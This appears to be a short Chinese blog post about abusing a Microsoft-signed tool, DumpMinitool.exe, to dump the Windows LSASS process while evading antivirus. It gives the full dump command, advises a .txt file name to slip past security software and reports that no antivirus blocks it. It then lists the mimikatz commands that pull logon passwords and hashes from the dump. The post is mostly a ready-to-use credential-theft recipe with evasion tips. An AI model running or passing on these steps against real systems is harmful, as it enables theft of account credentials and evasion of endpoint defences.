微软签名DumpMinitool.exe,免杀dump hash
微软签名的exe
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/f936379a026309e192b975c87f1c463d.png)
dump lsass进程
DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full
--file 保存文件名为1.txt 规避一下杀软
--processId lsass.exe 进程号
杀软无拦截
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/2abccc48b44e6d4abb976de085a91c19.png)
查看1.dmp
sekurlsa::minidump "1.dmp"
sekurlsa::logonpasswords
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/48ed016fc20f17fa59fc4a90088c46e1.png)
参考文章:https://mp.weixin.qq.com/s/Q3XKEciDJggUqMHMc9Zdnw